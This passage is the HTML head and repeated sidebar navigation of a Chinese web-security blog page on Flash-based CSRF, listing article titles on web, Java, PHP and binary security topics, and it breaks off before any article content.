<!DOCTYPE html>
<html lang="zh-CN">

<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>

    
      <link rel="icon" href="/kanxi.jpg">
    

    <title>
        
          Flash型CSRF总结 - Mi1k7ea
        
    </title>

    <!-- Spectre.css framework -->
    <link rel="stylesheet" href="https://unpkg.com/spectre.css/dist/spectre.min.css">
    <link rel="stylesheet" href="https://unpkg.com/spectre.css/dist/spectre-exp.min.css">
    <link rel="stylesheet" href="https://unpkg.com/spectre.css/dist/spectre-icons.min.css">

    <!-- Noto Sans TC -->
    <link href="https://fonts.googleapis.com/css?family=Noto+Sans+TC" rel="stylesheet">
    <!-- Noto Sans SC -->
    <link href="https://fonts.googleapis.com/css?family=Noto+Sans+SC" rel="stylesheet">
    <!-- Noto Sans -->
    <link href="https://fonts.googleapis.com/css?family=Noto+Sans" rel="stylesheet">

    <!-- theme css & js -->
    <link rel="stylesheet" href="/css/book.css">
    <script src="/js/book.js"></script>

    <!-- tocbot -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css">
    
    <!-- katex -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css">

    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/zooming/2.1.1/zooming.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    const zooming = new Zooming()
    zooming.listen('img')
})
</script>

</head>

<body>

<div class="container">
  <div class="book-container">
    <div class="columns">
      <div class="column col-2 hide-lg">
        <div class="book-sidebar">
  <h4 class="site-meta">
    <a href="/">Mi1k7ea</a>
  </h4>
  <div class="sidebar-content">
    <ul>
<li><strong><a href="/archives/">文章归档</a></strong></li>
<li><strong>Web安全</strong><ul>
<li>Web安全基础&amp;Tricks<ul>
<li><a href="/2019/10/14/文件上传漏洞总结/">文件上传攻击框架</a></li>
<li><a href="/2019/10/04/CSWSH漏洞总结/">CSWSH漏洞总结</a></li>
<li><a href="/2019/09/28/SSI注入漏洞总结/">SSI注入漏洞总结</a></li>
<li><a href="/2019/08/20/JSONP跨域漏洞总结/">JSONP跨域漏洞总结</a></li>
<li><a href="/2019/08/18/CORS跨域漏洞总结/">CORS跨域漏洞总结</a></li>
<li><a href="/2019/08/18/利用HTML注入劫持标签Bypass-CSP/">利用HTML注入劫持标签Bypass CSP</a></li>
<li><a href="/2019/08/11/NoSQL注入之MongoDB/">NoSQL注入之MongoDB</a></li>
<li><a href="/2019/08/10/Flash安全总结/">Flash安全总结</a></li>
<li><a href="/2019/08/05/利用Flash进行Json-CSRF攻击/">利用Flash进行Json CSRF攻击</a></li>
<li><a href="/2019/07/31/SWFUpload-swf的Flash型XSS分析/">SWFUpload.swf的Flash型XSS分析</a></li>
<li><a href="/2019/07/30/ZeroClipboard-swf的Flash型XSS分析/">ZeroClipboard.swf的Flash型XSS分析</a></li>
<li><a href="/2019/07/28/Flash型CSRF总结/">Flash型CSRF总结</a></li>
<li><a href="/2019/07/21/Flash型XSS小结/">Flash型XSS总结</a></li>
<li><a href="/2019/06/30/XSS从弹框到RCE/">XSS从弹框到RCE（IE）</a></li>
<li><a href="/2019/06/30/命令注入Bypass技巧小结/">命令注入Bypass技巧小结</a></li>
<li><a href="/2019/06/25/浅析DOM型XSS/">浅析DOM型XSS</a></li>
<li><a href="/2019/03/22/图片XSS小结/">图片XSS小结</a></li>
<li><a href="/2019/02/24/CSP策略及绕过技巧小结/">CSP策略及绕过技巧小结</a></li>
<li><a href="/2019/02/19/一些加载XSS-Payload的标签/">一些加载XSS Payload的标签</a></li>
<li><a href="/2019/02/16/个人XSS-payload收集/">个人XSS payload收集</a></li>
<li><a href="/2019/01/30/常见Web漏洞类型/">常见Web漏洞类型总结</a></li>
<li><a href="/2019/01/01/Sqli-labs-writeup/">Sqli-labs Less1-20</a></li>
<li><a href="/2019/01/01/SQL注入写WebShell方式小结/">SQL注入写WebShell方式小结</a></li>
</ul>
</li>
<li>Web安全之机器学习</li>
<li>WriteUp Web<ul>
<li><a href="/2019/10/20/InCTF-2019-PHP三题复现/">InCTF 2019 PHP+1,+1.5,+2.5三题复现</a></li>
<li><a href="/2019/10/05/upload-labs-WriteUp/">Upload-Labs WriteUp</a></li>
<li><a href="/2019/09/28/bWAPP之Cross-Origin-Resource-Sharing-AJAX/">bWAPP之Cross-Origin Resource Sharing (AJAX)</a></li>
<li><a href="/2019/07/02/DVWA之JavaScript攻击/">DVWA之JavaScript攻击</a></li>
<li><a href="/2019/06/27/一道Bypass正则过滤的反序列化漏洞题目/">一道Bypass正则过滤的反序列化漏洞题目</a></li>
<li><a href="/2019/06/27/从一道CTF题看如何利用本地DTD文件实现XXE攻击/">从一道CTF题看如何通过本地DTD文件利用XXE实现回显</a></li>
<li><a href="/2019/03/31/0CTF-Web-writeup/">0CTF Web writeup</a></li>
<li><a href="/2019/03/29/Securinets-CTF-Web-writeup/">Securinets CTF Web writeup</a></li>
<li><a href="/2019/03/21/Teaser-CONFidence-CTF-Web-writeup/">Teaser CONFidence CTF Web writeup</a></li>
<li><a href="/2019/03/17/SpEL注入之javacon/">SpEL注入之javacon</a></li>
<li><a href="/2019/03/13/AeroCTF-writeupup之board-tracking-system/">AeroCTF writeupup之board tracking system</a></li>
<li><a href="/2019/03/09/TAMUctf-Web-writeup/">TAMUctf Web writeup</a></li>
<li><a href="/2019/02/21/一道绕过CSP的XSS题目/">一道绕过CSP的XSS题目</a></li>
<li><a href="/2019/02/15/XSS闯关之xss-haozi-me/">XSS闯关之xss.haozi.me</a></li>
<li><a href="/2019/01/01/通过DVWA学习DOM型XSS/">DVWA之DOM型XSS</a></li>
</ul>
</li>
</ul>
</li>
<li><strong>Java</strong><ul>
<li>Java安全<ul>
<li><a href="/2019/02/01/Java动态代理机制/">Java动态代理机制</a></li>
<li><a href="/2019/02/01/Java反射机制/">Java反射机制</a></li>
<li><a href="/2019/02/03/Java序列化和反序列化机制/">Java序列化和反序列化机制</a></li>
<li><a href="/2019/09/01/Java-RMI原理与使用/">Java RMI原理与使用</a></li>
<li><a href="/2019/11/25/（转）Java代码审计指南">（转）Java代码审计指南</a></li>
<li><a href="/2019/11/25/（转）Java项目中常见jar包的说明">（转）Java项目中常见jar包的说明</a></li>
<li><a href="/2019/06/09/探讨XXE防御之setFeature设置/">探讨XXE防御之setFeature设置</a></li>
<li><a href="/2019/05/26/XML注入之SAXBuilder/">XML注入之SAXBuilder</a></li>
<li><a href="/2019/05/26/XML注入之SAXParser/">XML注入之SAXParser</a></li>
<li><a href="/2019/05/24/XML注入之SAXReader/">XML注入之SAXReader</a></li>
<li><a href="/2019/02/13/XML注入之DocumentBuilder/">XML注入之DocumentBuilder与XXE攻击防御</a></li>
<li><a href="/2019/09/15/浅析JNDI注入/">浅析JNDI注入</a></li>
<li><a href="/2019/12/08/浅析Java-SPI安全/">浅析Java SPI安全</a></li>
<li><a href="/2019/02/06/Java反序列化漏洞/">Java反序列化漏洞</a></li>
<li><a href="/2019/01/01/XMLDecoder反序列化漏洞/">Java XMLDecoder反序列化漏洞</a></li>
<li><a href="/2019/10/21/XStream反序列化漏洞/">Java XStream反序列化漏洞</a></li>
<li><a href="/2019/11/29/Java-SnakeYaml反序列化漏洞">Java SnakeYaml反序列化漏洞</a></li>
<li><a href="/2019/12/07/Java-AMF3反序列化漏洞/">Java AMF3反序列化漏洞</a></li>
<li><a href="/2019/11/13/Fastjson系列五——高版本JDK绕过及检测与防御/">Fastjson系列五——高版本JDK绕过及检测与防御</a></li>
<li><a href="/2019/11/11/Fastjson系列四——1-2-25-1-2-47反序列化漏洞（无需开启AutoType）/">Fastjson系列四——1.2.25-1.2.47反序列化漏洞（无需开启AutoType）</a></li>
<li><a href="/2019/11/10/Fastjson系列三——历史版本补丁绕过（需开启AutoType）/">Fastjson系列三——历史版本补丁绕过（需开启AutoType）</a></li>
<li><a href="/2019/11/07/Fastjson系列二——1-2-22-1-2-24反序列化漏洞/">Fastjson系列二——1.2.22-1.2.24反序列化漏洞</a></li>
<li><a href="/2019/11/03/Fastjson系列一——反序列化漏洞基本原理/">Fastjson系列一——反序列化漏洞基本原理</a></li>
<li><a href="/2019/11/24/Jackson系列七——其他Gadgets/">Jackson系列七——其他Gadgets与检测防御</a></li>
<li><a href="/2019/11/24/Jackson系列六——CVE-2019-12814（基于JDOM-XSLTransformer利用链）/">Jackson系列六——CVE-2019-12814（基于JDOM XSLTransformer利用链）</a></li>
<li><a href="/2019/11/22/Jackson系列五——CVE-2019-12384（基于logback利用链）/">Jackson系列五——CVE-2019-12384（基于logback利用链）</a></li>
<li><a href="/2019/11/19/Jackson系列四——CVE-2019-12086（基于MiniAdmin利用链）/">Jackson系列四——CVE-2019-12086（基于MiniAdmin利用链）</a></li>
<li><a href="/2019/11/17/Jackson系列三—CVE-2017-1748（基于ClassPathXmlApplicationContext利用链）/">Jackson系列三——CVE-2017-17485（基于ClassPathXmlApplicationContext利用链）</a></li>
<li><a href="/2019/11/16/Jackson系列二——CVE-2017-7525（基于TemplatesImpl利用链）/">Jackson系列二——CVE-2017-7525（基于TemplatesImpl利用链）</a></li>
<li><a href="/2019/11/13/Jackson系列一——反序列化漏洞基本原理/">Jackson系列一——反序列化漏洞基本原理</a></li>
</ul>
</li>
<li>Struts2</li>
<li>Spring<ul>
<li><a href="/2019/01/01/Spring基础篇之基本概念/">Spring基础篇之基本概念</a></li>
<li><a href="/2019/09/02/由JNDI注入导致的Spring-Framework反序列化漏洞/">由JNDI注入引发的Spring Framework反序列化漏洞</a></li>
<li><a href="/2019/04/05/Spring-Data-Rest之cve-2017-8046分析/">浅析Spring Data Rest之cve-2017-8046</a></li>
</ul>
</li>
<li>SpringCloud</li>
</ul>
</li>
<li><strong>PHP</strong><ul>
<li>PHP安全<ul>
<li><a href="/2019/08/25/浅谈PHP-FPM安全/">浅谈PHP-FPM安全</a></li>
<li><a href="/2019/08/03/从蚁剑插件看利用PHP-FPM绕过disable-functions/">从蚁剑插件看利用PHP-FPM绕过disable_functions</a></li>
<li><a href="/2019/07/20/浅谈几种Bypass-open-basedir的方法/">浅谈几种Bypass open_basedir的方法</a></li>
<li><a href="/2019/07/16/PHP中mail-函数安全问题与防御/">PHP中mail()函数安全问题与防御</a></li>
<li><a href="/2019/07/04/浅谈escapeshellarg与参数注入/">浅谈escapeshellarg逃逸与参数注入</a></li>
<li><a href="/2019/07/02/浅析preg-replace与preg-match/">浅析preg_replace与preg_match</a></li>
<li><a href="/2019/06/21/PHP弱类型小结/">PHP弱类型及相关函数Bypass小结</a></li>
<li><a href="/2019/06/20/PHP变量覆盖漏洞/">PHP变量覆盖漏洞小结</a></li>
<li><a href="/2019/06/09/巧用get-defined-functions隐藏WebShell/">巧用get_defined_functions隐藏WebShell</a></li>
<li><a href="/2019/06/07/从一道题看PHP7-4的FFI绕过disable-functions/">从RCTF nextphp看PHP7.4的FFI绕过disable_functions</a></li>
<li><a href="/2019/06/02/浅谈几种Bypass-disable-functions的方法/">浅谈几种Bypass disable_functions的方法</a></li>
<li><a href="/2019/05/04/PHP对象注入之pop链构造/">PHP对象注入之pop链构造</a></li>
<li><a href="/2019/04/21/PHP-session反序列化漏洞/">PHP session反序列化漏洞</a></li>
<li><a href="/2019/01/31/PHP伪协议/">PHP伪协议</a></li>
<li><a href="/2019/01/01/phar反序列化漏洞/">phar反序列化漏洞</a></li>
<li><a href="/2019/01/01/Windows下的一种PHP隐蔽后门姿势/">Windows下的一种PHP隐藏后门姿势</a></li>
<li><a href="/2019/01/01/PHP反序列化漏洞/">PHP unserialize反序列化漏洞</a></li>
<li><a href="/2019/01/01/PHP内存型木马/">PHP内存型木马</a></li>
</ul>
</li>
<li>CMS</li>
</ul>
</li>
<li><strong>Python</strong><ul>
<li>Python安全<ul>
<li><a href="/2019/06/02/浅析Python-Flask-SSTI/">浅析Python Flask SSTI</a></li>
<li><a href="/2019/05/31/Python沙箱逃逸小结/">Python沙箱逃逸小结</a></li>
<li><a href="/2019/01/01/PyYAML反序列化漏洞/">Python PyYAML反序列化漏洞</a></li>
<li><a href="/2019/01/01/cPickle反序列化漏洞/">Python cPickle反序列化漏洞</a></li>
</ul>
</li>
<li>安全开发<ul>
<li><a href="/2019/06/30/AWD文件监控脚本/">AWD文件监控脚本</a></li>
<li><a href="/2019/01/01/Python安全小工具之反编译pyc文件/">Python安全小工具之反编译pyc文件</a></li>
</ul>
</li>
<li>爬虫</li>
<li>Django</li>
</ul>
</li>
<li><strong>JavaScript</strong><ul>
<li>JavaScript安全<ul>
<li><a href="/2019/10/20/浅析JavaScript原型链污染攻击/">浅析JavaScript原型链污染攻击</a></li>
</ul>
</li>
<li>NodeJS</li>
<li>AngularJS</li>
</ul>
</li>
<li><strong>GO</strong><ul>
<li>GO安全</li>
</ul>
</li>
<li><strong>二进制安全</strong><ul>
<li>二进制基础<ul>
<li><a href="/2019/05/24/GOT表-PLT表与动态链接/">ELF动态链接,PLT和GOT</a></li>
<li><a href="/2019/04/27/堆基础/">堆基础</a></li>
<li><a href="/2019/04/15/ELF二进制格式/">ELF二进制格式</a></li>
<li><a href="/2019/03/03/栈及栈帧/">栈基础</a></li>
<li><a href="/2019/02/09/ELF安全防御机制小结/">ELF安全防御机制小结</a></li>
<li><a href="/2019/01/28/IA-32寄存器/">IA-32（Intel Architecture 32位）寄存器</a></li>
<li><a href="/2019/01/01/Linux环境与相关工具/">Linux环境与相关工具</a></li>
</ul>
</li>
<li>C/C++<ul>
<li><a href="/2019/03/24/C编写实现Linux反弹shell/">C编写实现Linux反弹shell</a></li>
</ul>
</li>
<li>逆向工程</li>
<li>Fuzzing</li>
<li>Pwn<ul>
<li><a href="/2019/04/20/花式栈溢出之stack-pivoting/">花式栈溢出之stack pivoting</a></li>
<li><a href="/2019/04/12/中级ROP之ret2csu/">栈溢出之ret2csu</a></li>
<li><a href="/2019/04/09/蒸米ROP学习笔记/">蒸米32位及64位ROP笔记</a></li>
<li><a href="/2019/04/07/pwntools笔记/">pwntools笔记</a></li>
<li><a href="/2019/03/23/花式栈溢出之Stack-smash/">花式栈溢出之Stack smash</a></li>
<li><a href="/2019/03/05/栈溢出之ret2libc/">栈溢出之ret2libc</a></li>
<li><a href="/2019/03/03/栈溢出之ret2syscall/">栈溢出之ret2syscall</a></li>
<li><a href="/2019/03/03/栈溢出之ret2shellcode/">栈溢出之ret2shellcode</a></li>
<li><a href="/2019/03/03/ROP之ret2text/">ROP基础及栈溢出之ret2text</a></li>
<li><a href="/2019/03/03/栈溢出基本原理/">栈溢出基本原理</a></li>
</ul>
</li>
<li>WriteUp Pwn<ul>
<li><a href="/2019/03/08/TAMUctf-Pwn-writeup/">TAMUctf Pwn writeup</a></li>
</ul>
</li>
<li>WriteUp Reverse<ul>
<li><a href="/2019/01/01/HITB_Binary_100_writeup/">HITB Binary 100 writeup</a></li>
</ul>
</li>
</ul>
</li>
<li><strong>渗透测试</strong><ul>
<li>基础&amp;Tricks</li>
<li>Kali</li>
<li>Metasploit</li>
<li>内网渗透</li>
<li>提权<ul>
<li><a href="/2019/01/01/关于本地提权的学习笔记（一）：Administrator提权到System">Administrator提权到System</a></li>
<li><a href="/2019/01/01/关于本地提权的学习笔记（二）：注入进程和利用漏洞提权">注入进程和利用漏洞提权</a></li>
</ul>
</li>
<li>免杀</li>
<li>工具</li>
</ul>
</li>
<li><strong>OS</strong><ul>
<li>Windows<ul>
<li><a href="/2019/01/01/将Python脚本转换为exe">将Python脚本转换为exe</a></li>
<li><a href="/2019/01/01/几个查看用户信息的Windows程序">几个查看用户信息的Windows程序</a></li>
</ul>
</li>
<li>Linux</li>
</ul>
</li>
</ul>

  </div>
</div>

<script src="/js/book-sidebar.js"></script>

<script>
collapse_sidebar(2)
highlight_tab()
show_sidebar()
</script>
      </div>

      <div class="column col-8 col-lg-12">
        <div class="book-content">
          <div class="book-navbar">
  <header class="navbar">
  <section class="navbar-section">
    <img class="navbar-icon" src="/kanxi.jpg">
  </section>
  <section class="navbar-center">
    Mi1k7ea
  </section>
  <section class="navbar-section">
    <label class="accordion-header c-hand" for="accordion-sidebar">
      <i class="icon icon-menu"></i>
    </label>
  </section>
</header>

<div class="accordion">
  <input type="checkbox" id="accordion-sidebar" name="accordion-checkbox" hidden>
  <div class="accordion-body">
    <ul>
<li><strong><a href="/archives/">文章归档</a></strong></li>
<li><strong>Web安全</strong><ul>
<li>Web安全基础&amp;Tricks<ul>
<li><a href="/2019/10/14/文件上传漏洞总结/">文件上传攻击框架</a></li>
<li><a href="/2019/10/04/CSWSH漏洞总结/">CSWSH漏洞总结</a></li>
<li><a href="/2019/09/28/SSI注入漏洞总结/">SSI注入漏洞总结</a></li>
<li><a href="/2019/08/20/JSONP跨域漏洞总结/">JSONP跨域漏洞总结</a></li>
<li><a href="/2019/08/18/CORS跨域漏洞总结/">CORS跨域漏洞总结</a></li>
<li><a href="/2019/08/18/利用HTML注入劫持标签Bypass-CSP/">利用HTML注入劫持标签Bypass CSP</a></li>
<li><a href="/2019/08/11/NoSQL注入之MongoDB/">NoSQL注入之MongoDB</a></li>
<li><a href="/2019/08/10/Flash安全总结/">Flash安全总结</a></li>
<li><a href="/2019/08/05/利用Flash进行Json-CSRF攻击/">利用Flash进行Json CSRF攻击</a></li>
<li><a href="/2019/07/31/SWFUpload-swf的Flash型XSS分析/">SWFUpload.swf的Flash型XSS分析</a></li>
<li><a href="/2019/07/30/ZeroClipboard-swf的Flash型XSS分析/">ZeroClipboard.swf的Flash型XSS分析</a></li>
<li><a href="/2019/07/28/Flash型CSRF总结/">Flash型CSRF总结</a></li>
<li><a href="/2019/07/21/Flash型XSS小结/">Flash型XSS总结</a></li>
<li><a href="/2019/06/30/XSS从弹框到RCE/">XSS从弹框到RCE（IE）</a></li>
<li><a href="/2019/06/30/命令注入Bypass技巧小结/">命令注入Bypass技巧小结</a></li>
<li><a href="/2019/06/25/浅析DOM型XSS/">浅析DOM型XSS</a></li>
<li><a href="/2019/03/22/图片XSS小结/">图片XSS小结</a></li>
<li><a href="/2019/02/24/CSP策略及绕过技巧小结/">CSP策略及绕过技巧小结</a></li>
<li><a href="/2019/02/19/一些加载XSS-Payload的标签/">一些加载XSS Payload的标签</a></li>
<li><a href="/2019/02/16/个人XSS-payload收集/">个人XSS payload收集</a></li>
<li><a href="/2019/01/30/常见Web漏洞类型/">常见Web漏洞类型总结</a></li>
<li><a href="/2019/01/01/Sqli-labs-writeup/">Sqli-labs Less1-20</a></li>
<li><a href="/2019/01/01/SQL注入写WebShell方式小结/">SQL注入写WebShell方式小结</a></li>
</ul>
</li>
<li>Web安全之机器学习</li>
<li>WriteUp Web<ul>
<li><a href="/2019/10/20/InCTF-2019-PHP三题复现/">InCTF 2019 PHP+1,+1.5,+2.5三题复现</a></li>
<li><a href="/2019/10/05/upload-labs-WriteUp/">Upload-Labs WriteUp</a></li>
<li><a href="/2019/09/28/bWAPP之Cross-Origin-Resource-Sharing-AJAX/">bWAPP之Cross-Origin Resource Sharing (AJAX)</a></li>
<li><a href="/2019/07/02/DVWA之JavaScript攻击/">DVWA之JavaScript攻击</a></li>
<li><a href="/2019/06/27/一道Bypass正则过滤的反序列化漏洞题目/">一道Bypass正则过滤的反序列化漏洞题目</a></li>
<li><a href="/2019/06/27/从一道CTF题看如何利用本地DTD文件实现XXE攻击/">从一道CTF题看如何通过本地DTD文件利用XXE实现回显</a></li>
<li><a href="/2019/03/31/0CTF-Web-writeup/">0CTF Web writeup</a></li>
<li><a href="/2019/03/29/Securinets-CTF-Web-writeup/">Securinets CTF Web writeup</a></li>
<li><a href="/2019/03/21/Teaser-CONFidence-CTF-Web-writeup/">Teaser CONFidence CTF Web writeup</a></li>
<li><a href="/2019/03/17/SpEL注入之javacon/">SpEL注入之javacon</a></li>
<li><a href="/2019/03/13/AeroCTF-writeupup之board-tracking-system/">AeroCTF writeupup之board tracking system</a></li>
<li><a href="/2019/03/09/TAMUctf-Web-writeup/">TAMUctf Web writeup</a></li>
<li><a href="/2019/02/21/一道绕过CSP的XSS题目/">一道绕过CSP的XSS题目</a></li>
<li><a href="/2019/02/15/XSS闯关之xss-haozi-me/">XSS闯关之xss.haozi.me</a></li>
<li><a href="/2019/01/01/通过DVWA学习DOM型XSS/">DVWA之DOM型XSS</a></li>
</ul>
</li>
</ul>
</li>
<li><strong>Java</strong><ul>
<li>Java安全<ul>
<li><a href="/2019/02/01/Java动态代理机制/">Java动态代理机制</a></li>
<li><a href="/2019/02/01/Java反射机制/">Java反射机制</a></li>
<li><a href="/2019/02/03/Java序列化和反序列化机制/">Java序列化和反序列化机制</a></li>
<li><a href="/2019/09/01/Java-RMI原理与使用/">Java RMI原理与使用</a></li>
<li><a href="/2019/11/25/（转）Java代码审计指南">（转）Java代码审计指南</a></li>
<li><a href="/2019/11/25/（转）Java项目中常见jar包的说明">（转）Java项目中常见jar包的说明</a></li>
<li><a href="/2019/06/09/探讨XXE防御之setFeature设置/">探讨XXE防御之setFeature设置</a></li>
<li><a href="/2019/05/26/XML注入之SAXBuilder/">XML注入之SAXBuilder</a></li>
<li><a href="/2019/05/26/XML注入之SAXParser/">XML注入之SAXParser</a></li>
<li><a href="/2019/05/24/XML注入之SAXReader/">XML注入之SAXReader</a></li>
<li><a href="/2019/02/13/XML注入之DocumentBuilder/">XML注入之DocumentBuilder与XXE攻击防御</a></li>
<li><a href="/2019/09/15/浅析JNDI注入/">浅析JNDI注入</a></li>
<li><a href="/2019/12/08/浅析Java-SPI安全/">浅析Java SPI安全</a></li>
<li><a href="/2019/02/06/Java反序列化漏洞/">Java反序列化漏洞</a></li>
<li><a href="/2019/01/01/XMLDecoder反序列化漏洞/">Java XMLDecoder反序列化漏洞</a></li>
<li><a href="/2019/10/21/XStream反序列化漏洞/">Java XStream反序列化漏洞</a></li>
<li><a href="/2019/11/29/Java-SnakeYaml反序列化漏洞">Java SnakeYaml反序列化漏洞</a></li>
<li><a href="/2019/12/07/Java-AMF3反序列化漏洞/">Java AMF3反序列化漏洞</a></li>
<li><a href="/2019/11/13/Fastjson系列五——高版本JDK绕过及检测与防御/">Fastjson系列五——高版本JDK绕过及检测与防御</a></li>
<li><a href="/2019/11/11/Fastjson系列四——1-2-25-1-2-47反序列化漏洞（无需开启AutoType）/">Fastjson系列四——1.2.25-1.2.47反序列化漏洞（无需开启AutoType）</a></li>
<li><a href="/2019/11/10/Fastjson系列三——历史版本补丁绕过（需开启AutoType）/">Fastjson系列三——历史版本补丁绕过（需开启AutoType）</a></li>
<li><a href="/2019/11/07/Fastjson系列二——1-2-22-1-2-24反序列化漏洞/">Fastjson系列二——1.2.22-1.2.24反序列化漏洞</a></li>
<li><a href="/2019/11/03/Fastjson系列一——反序列化漏洞基本原理/">Fastjson系列一——反序列化漏洞基本原理</a></li>
<li><a href="/2019/11/24/Jackson系列七——其他Gadgets/">Jackson系列七——其他Gadgets与检测防御</a></li>
<li><a href="/2019/11/24/Jackson系列六——CVE-2019-12814（基于JDOM-XSLTransformer利用链）/">Jackson系列六——CVE-2019-12814（基于JDOM XSLTransformer利用链）</a></li>
<li><a href="/2019/11/22/Jackson系列五——CVE-2019-12384（基于logback利用链）/">Jackson系列五——CVE-2019-12384（基于logback利用链）</a></li>
<li><a href="/2019/11/19/Jackson系列四——CVE-2019-12086（基于MiniAdmin利用链）/">Jackson系列四——CVE-2019-12086（基于MiniAdmin利用链）</a></li>
<li><a href="/2019/11/17/Jackson系列三—CVE-2017-1748（基于ClassPathXmlApplicationContext利用链）/">Jackson系列三——CVE-2017-17485（基于ClassPathXmlApplicationContext利用链）</a></li>
<li><a href="/2019/11/16/Jackson系列二——CVE-2017-7525（基于TemplatesImpl利用链）/">Jackson系列二——CVE-2017-7525（基于TemplatesImpl利用链）</a></li>
<li><a href="/2019/11/13/Jackson系列一——反序列化漏洞基本原理/">Jackson系列一——反序列化漏洞基本原理</a></li>
</ul>
</li>
<li>Struts2</li>
<li>Spring<ul>
<li><a href="/2019/01/01/Spring基础篇之基本概念/">Spring基础篇之基本概念</a></li>
<li><a href="/2019/09/02/由JNDI注入导致的Spring-Framework反序列化漏洞/">由JNDI注入引发的Spring Framework反序列化漏洞</a></li>
<li><a href="/2019/04/05/Spring-Data-Rest之cve-2017-8046分析/">浅析Spring Data Rest之cve-2017-8046</a></li>
</ul>
</li>
<li>SpringCloud</li>
</ul>
</li>
<li><strong>PHP</strong><ul>
<li>PHP安全<ul>
<li><a href="/2019/08/25/浅谈PHP-FPM安全/">浅谈PHP-FPM安全</a></li>
<li><a href="/2019/08/03/从蚁剑插件看利用PHP-FPM绕过disable-functions/">从蚁剑插件看利用PHP-FPM绕过disable_functions</a></li>
<li><a href="/2019/07/20/浅谈几种Bypass-open-basedir的方法/">浅谈几种Bypass open_basedir的方法</a></li>
<li><a href="/2019/07/16/PHP中mail-函数安全问题与防御/">PHP中mail()函数安全问题与防御</a></li>
<li><a href="/2019/07/04/浅谈escapeshellarg与参数注入/">浅谈escapeshellarg逃逸与参数注入</a></li>
<li><a href="/2019/07/02/浅析preg-replace与preg-match/">浅析preg_replace与preg_match</a></li>
<li><a href="/2019/06/21/PHP弱类型小结/">PHP弱类型及相关函数Bypass小结</a></li>
<li><a href="/2019/06/20/PHP变量覆盖漏洞/">PHP变量覆盖漏洞小结</a></li>
<li><a href="/2019/06/09/巧用get-defined-functions隐藏WebShell/">巧用get_defined_functions隐藏WebShell</a></li>
<li><a href="/2019/06/07/从一道题看PHP7-4的FFI绕过disable-functions/">从RCTF nextphp看PHP7.4的FFI绕过disable_functions</a></li>
<li><a href="/2019/06/02/浅谈几种Bypass-disable-functions的方法/">浅谈几种Bypass disable_functions的方法</a></li>
<li><a href="/2019/05/04/PHP对象注入之pop链构造/">PHP对象注入之pop链构造</a></li>
<li><a href="/2019/04/21/PHP-session反序列化漏洞/">PHP session反序列化漏洞</a></li>
<li><a href="/2019/01/31/PHP伪协议/">PHP伪协议</a></li>
<li><a href="/2019/01/01/phar反序列化漏洞/">phar反序列化漏洞</a></li>
<li><a href="/2019/01/01/Windows下的一种PHP隐蔽后门姿势/">Windows下的一种PHP隐藏后门姿势</a></li>
<li><a href="/2019/01/01/PHP反序列化漏洞/">PHP unserialize反序列化漏洞</a></li>
<li><a href="/2019/01/01/PHP内存型木马/">PHP内存型木马</a></li>
</ul>
</li>
<li>CMS</li>
</ul>
</li>
<li><strong>Python</strong><ul>
<li>Python安全<ul>
<li><a href="/2019/06/02/浅析Python-Flask-SSTI/">浅析Python Flask SSTI</a></li>
<li><a href="/2019/05/31/Python沙箱逃逸小结/">Python沙箱逃逸小结</a></li>
<li><a href="/2019/01/01/PyYAML反序列化漏洞/">Python PyYAML反序列化漏洞</a></li>
<li><a href="/2019/01/01/cPickle反序列化漏洞/">Python cPickle反序列化漏洞</a></li>
</ul>
</li>
<li>安全开发<ul>
<li><a href="/2019/06/30/AWD文件监控脚本/">AWD文件监控脚本</a></li>
<li><a href="/2019/01/01/Python安全小工具之反编译pyc文件/">Python安全小工具之反编译pyc文件</a></li>
</ul>
</li>
<li>爬虫</li>
<li>Django</li>
</ul>
</li>
<li><strong>JavaScript</strong><ul>
<li>JavaScript安全<ul>
<li><a href="/2019/10/20/浅析JavaScript原型链污染攻击/">浅析JavaScript原型链污染攻击</a></li>
</ul>
</li>
<li>NodeJS</li>
<li>AngularJS</li>
</ul>
</li>
<li><strong>GO</strong><ul>
<li>GO安全</li>
</ul>
</li>
<li><strong>二进制安全</strong><ul>
<li>二进制基础<ul>
<li><a href="/2019/05/24/GOT表-PLT表与动态链接/">ELF动态链接,PLT和GOT</a></li>
<li><a href="/2019/04/27/堆基础/">堆基础</a></li>
<li><a href="/2019/04/15/ELF二进制格式/">ELF二进制格式</a></li>
<li><a href="/2019/03/03/栈及栈帧/">栈基础</a></li>
<li><a href="/2019/02/09/ELF安全防御机制小结/">ELF安全防御机制小结</a></li>
<li><a href="/2019/01/28/IA-32寄存器/">IA-32（Intel Architecture 32位）寄存器</a></li>
<li><a href="/2019/01/01/Linux环境与相关工具/">Linux环境与相关工具</a></li>
</ul>
</li>
<li>C/C++<ul>
<li><a href="/2019/03/24/C编写实现Linux反弹shell/">C编写实现Linux反弹shell</a></li>
</ul>
</li>
<li>逆向工程</li>
<li>Fuzzing</li>
<li>Pwn<ul>
<li><a href="/2019/04/20/花式栈溢出之stack-pivoting/">花式栈溢出之stack pivoting</a></li>
<li><a href="/2019/04/12/中级ROP之ret2csu/">栈溢出之ret2csu</a></li>
<li><a href="/2019/04/09/蒸米ROP学习笔记/">蒸米32位及64位ROP笔记</a></li>
<li><a href="/2019/04/07/pwntools笔记/">pwntools笔记</a></li>
<li><a href="/2019/03/23/花式栈溢出之Stack-smash/">花式栈溢出之Stack smash</a></li>
<li><a href="/2019/03/05/栈溢出之ret2libc/">栈溢出之ret2libc</a></li>
<li><a href="/2019/03/03/栈溢出之ret2syscall/">栈溢出之ret2syscall</a></li>
<li><a href="/2019/03/03/栈溢出之ret2shellcode/">栈溢出之ret2shellcode</a></li>
<li><a href="/2019/03/03/ROP之ret2text/">ROP基础及栈溢出之ret2text</a></li>
<li><a href="/2019/03/03/栈溢出基本原理/">栈溢出基本原理</a></li>
</ul>
</li>
<li>WriteUp Pwn<ul>
<li><a href="/2019/03/08/TAMUctf-Pwn-writeup/">TAMUctf Pwn writeup</a></li>
</ul>
</li>
<li>WriteUp Reverse<ul>
